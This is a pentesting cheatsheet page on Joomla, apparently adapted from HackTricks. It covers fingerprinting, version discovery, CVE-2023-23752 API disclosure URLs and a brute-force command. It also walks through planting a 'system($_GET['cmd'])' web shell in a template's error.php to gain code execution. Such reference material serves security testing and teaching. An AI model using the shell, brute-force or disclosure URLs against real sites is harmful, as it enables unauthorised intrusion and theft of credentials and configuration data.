daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

joomla.md (5331B)


      1 ---
      2 title: "Joomla"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/pentesting-web/joomla.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-web/joomla.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Joomla
     14 
     15 ### Joomla Statistics
     16 
     17 Joomla publishes opt-in anonymous usage statistics, including CMS, PHP, database, and operating-system distributions. The values below are only a historical response example; query the API for current data.<sup>[[2]](#references)</sup>
     18 
     19 ```bash
     20 curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool
     21 
     22 {
     23     "data": {
     24         "cms_version": {
     25             "3.0": 0,
     26             "3.1": 0,
     27             "3.10": 6.33,
     28             "3.2": 0.01,
     29             "3.3": 0.02,
     30             "3.4": 0.05,
     31             "3.5": 12.24,
     32             "3.6": 22.85,
     33             "3.7": 7.99,
     34             "3.8": 17.72,
     35             "3.9": 27.24,
     36             "4.0": 3.21,
     37             "4.1": 1.53,
     38             "4.2": 0.82,
     39             "4.3": 0,
     40             "5.0": 0
     41         },
     42         "total": 2951032
     43     }
     44 }
     45 ```
     46 
     47 ## Enumeration
     48 
     49 ### Discovery/Footprinting
     50 
     51 - Check the **meta**
     52 
     53 ```bash
     54 curl https://www.joomla.org/ | grep Joomla | grep generator
     55 
     56 <meta name="generator" content="Joomla! - Open Source Content Management" />
     57 ```
     58 
     59 - robots.txt
     60 
     61 ```text
     62 # If the Joomla site is installed within a folder
     63 # eg www.example.com/joomla/ then the robots.txt file
     64 # MUST be moved to the site root
     65 # eg www.example.com/robots.txt
     66 # AND the joomla folder name MUST be prefixed to all of the
     67 # paths.
     68 [...]
     69 ```
     70 
     71 - README.txt
     72 
     73 ```text
     74 1- What is this?
     75 	* This is a Joomla! installation/upgrade package to version 3.x
     76 	* Joomla! Official site: https://www.joomla.org
     77 	* Joomla! 3.9 version history - [https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history](https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history)
     78 	* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging
     79 ```
     80 
     81 ### Version
     82 
     83 - In **/administrator/manifests/files/joomla.xml** you can see the version.
     84 - In **/language/en-GB/en-GB.xml** you can get the version of Joomla.
     85 - In **plugins/system/cache/cache.xml** you can see an approximate version.
     86 
     87 ### Automatic
     88 
     89 ```bash
     90 droopescan scan joomla --url http://joomla-site.local/
     91 ```
     92 
     93 In[ **80,443 - Pentesting Web Methodology is a section about CMS scanners**](#cms-scanners) that can scan Joomla.
     94 
     95 ### API Unauthenticated Information Disclosure:
     96 
     97 Joomla 4.0.0 through 4.2.7 is affected by CVE-2023-23752, an improper API access check that can disclose configuration data. Exposure depends on the deployed configuration and accessible API routes; upgrade rather than relying on route filtering.<sup>[[3]](#references)</sup>
     98 
     99 - Users: `http://<host>/api/v1/users?public=true`
    100 - Config File: `http://<host>/api/index.php/v1/config/application?public=true`
    101 
    102 **MSF module:** `scanner/http/joomla_api_improper_access_checks`; Exploit-DB also preserves a Ruby proof of concept.<sup>[[4]](#references)</sup>
    103 
    104 ### Brute-Force
    105 
    106 The `joomla-bruteforce` script can perform bounded credential testing against the login.<sup>[[5]](#references)</sup>
    107 
    108 ```text
    109 sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
    110 
    111 admin:admin
    112 ```
    113 
    114 ## RCE
    115 
    116 If you managed to get **admin credentials** you can **RCE inside of it** by adding a snippet of **PHP code** to gain **RCE**. We can do this by **customizing** a **template**.
    117 
    118 1. **Click** on **`Templates`** on the bottom left under `Configuration` to pull up the templates menu.
    119 2. **Click** on a **template** name. Let's choose **`protostar`** under the `Template` column header. This will bring us to the **`Templates: Customise`** page.
    120 3. Finally, you can click on a page to pull up the **page source**. Let's choose the **`error.php`** page. We'll add a **PHP one-liner to gain code execution** as follows:
    121    1. **`system($_GET['cmd']);`**
    122 4. **Save & Close**
    123 5. `curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id`
    124 
    125 ## From XSS to RCE
    126 
    127 - **JoomSploit** documents chains that elevate XSS into RCE or other critical impact on supported Joomla 3.x through 5.x targets.<sup>[[1]](#references)[[6]](#references)</sup> It supports:
    128   - _**Privilege escalation:**_ Creates a user in Joomla.
    129   - _**(RCE) Built-in template edit:**_ Edits a built-in Joomla template.
    130   - _**(Custom) Custom Exploits:**_ Custom Exploits for Third-Party Joomla Plugins.
    131 
    132 ## References
    133 
    134 - [1] [Elevating Low Vulnerabilities to Critical in CMSs and E-Commerce Platforms](https://nowak0x01.github.io/papers/76bc0832a8f682a7e0ed921627f85d1d.html)
    135 - [2] [Joomla Developer Network — Usage Statistics API](https://developer.joomla.org/about/stats/api.html)
    136 - [3] [NVD — CVE-2023-23752](https://nvd.nist.gov/vuln/detail/CVE-2023-23752)
    137 - [4] [Exploit-DB 51334 — Joomla API unauthenticated information disclosure](https://www.exploit-db.com/exploits/51334)
    138 - [5] [ajnik/joomla-bruteforce](https://github.com/ajnik/joomla-bruteforce)
    139 - [6] [nowak0x01/JoomSploit](https://github.com/nowak0x01/JoomSploit)